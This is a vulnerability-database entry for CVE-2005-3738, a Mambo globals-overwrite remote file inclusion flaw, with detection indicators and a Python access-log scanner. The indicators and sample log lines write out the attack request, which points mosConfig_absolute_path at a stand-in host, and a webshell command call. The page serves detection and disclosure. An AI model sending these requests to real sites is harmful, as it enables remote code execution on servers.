CVE-2005-3738
Published: 2005-11-22
Priority: P2 · 60 · low
CVSS 2.0: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 3.56% (87.9th percentile)
globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and conduct various attacks, as demonstrated using the mosConfig_absolute_path parameter to content.html.php for remote PHP file inclusion.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
| mambo | mambo_site_server | — | — |
Detection & IOCs (extracted from sources)
Path: index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
- Detect exploitation attempts by looking for HTTP GET requests to index.php containing both 'GLOBALS=' and 'mosConfig_absolute_path=' parameters simultaneously, which is the hallmark of the globals overwrite attack vector.
- Alert on HTTP requests containing the User-Agent string 'NeuralBot/0.2', used in the first stage of the exploit to trigger remote file inclusion via mosConfig_absolute_path.
- Alert on HTTP requests containing the User-Agent string 'S.T.A.L.K.E.R.', used in the second stage of the exploit to execute commands via the dropped webshell (suntzu.php).
- Detect presence of the dropped webshell by monitoring for HTTP requests to 'suntzu.php' with a 'cmd=' query parameter, indicating post-exploitation command execution.
- The exploit checks for the string 'Hi Master' in the HTTP response to confirm successful exploitation; monitor web server responses for this string as a post-exploitation indicator.
- The attacker stages a PHP payload at a remote location under /includes/HTML_toolbar.php/index.html; monitor outbound HTTP requests from the web server to external hosts fetching this path.
- Note: the vulnerability is only exploitable when PHP's register_globals is DISABLED; with register_globals enabled, the GLOBALS array overwrite via GET/POST parameters is not possible through this vector.
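The request-side indicators above can be applied to web server access logs as follows. This is an added example, not a rule from any of the cited sources; it assumes Apache/nginx "combined" log format, the tag names are hypothetical, and the sample lines are constructed. It goes slightly beyond the literal string match by percent-decoding parameter names and treating array-style names such as `GLOBALS[x]` as `GLOBALS`.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" access-log format (assumed log source).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# User-Agent strings named in the indicators above; tag names are hypothetical.
STAGE_UAS = {"NeuralBot/0.2": "ua-stage1", "S.T.A.L.K.E.R.": "ua-stage2"}

def classify(line):
    """Return the set of indicator tags matched by one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return set()
    url = urlsplit(m["target"])
    script = unquote(url.path).rsplit("/", 1)[-1].lower()
    # parse_qsl percent-decodes names; keep_blank_values is needed because the
    # request carries an empty "GLOBALS=". "GLOBALS[x]" is reduced to "GLOBALS".
    names = {k.split("[", 1)[0]
             for k, _ in parse_qsl(url.query, keep_blank_values=True)}
    hits = set()
    if script == "index.php" and {"GLOBALS", "mosConfig_absolute_path"} <= names:
        hits.add("globals-overwrite")
    if script == "suntzu.php" and "cmd" in names:
        hits.add("webshell-cmd")
    hits.update(tag for ua, tag in STAGE_UAS.items() if ua in m["ua"])
    return hits

def scan(lines):
    """Return (line_number, client_ip, sorted tags) for every matching line."""
    out = []
    for n, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            out.append((n, line.split(" ", 1)[0], sorted(tags)))
    return out

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Nov/2005:10:00:01 +0000] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://placeholder.example/ HTTP/1.0" 200 512 "-" "NeuralBot/0.2"',
    '192.0.2.10 - - [22/Nov/2005:10:00:03 +0000] "GET /suntzu.php?cmd=id HTTP/1.0" 200 40 "-" "S.T.A.L.K.E.R."',
    '192.0.2.11 - - [22/Nov/2005:10:00:05 +0000] "GET /index.php?%47LOBALS=&mosConfig_absolute_path=x HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Nov/2005:10:01:00 +0000] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The 'Hi Master' response string and the outbound fetch of /includes/HTML_toolbar.php/index.html are not visible in inbound access logs and need response-body or egress monitoring instead.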
CVSS provenance
nvd · v2.0 · 2.6 · LOW · AV:N/AC:H/Au:N/C:N/I:P/A:N
vulncheck · 2.6 · LOW
GHSA
GHSA-qg6h-2v97-496v: globals
ghsa_unreviewed·2022-05-01
CVE-2005-3738 [LOW] GHSA-qg6h-2v97-496v: globals
VulnCheck
mambo mambo_site_server Improper Control of Generation of Code ('Code Injection')
vulncheck·2005·CVSS 2.6
CVE-2005-3738 [LOW] mambo mambo_site_server Improper Control of Generation of Code ('Code Injection')
Affected: mambo mambo_site_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2005-3738
No detection rules found.
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html
- http://forum.mamboserver.com/showthread.php?t=66154
- http://secunia.com/advisories/17622
- http://securitytracker.com/id?1015258
- http://www.securityfocus.com/archive/1/417215
- http://www.securityfocus.com/archive/1/426942/100/0/threaded
- http://www.securityfocus.com/archive/1/427196/100/0/threaded
- http://www.securityfocus.com/bid/15461
- http://www.vupen.com/english/advisories/2005/2473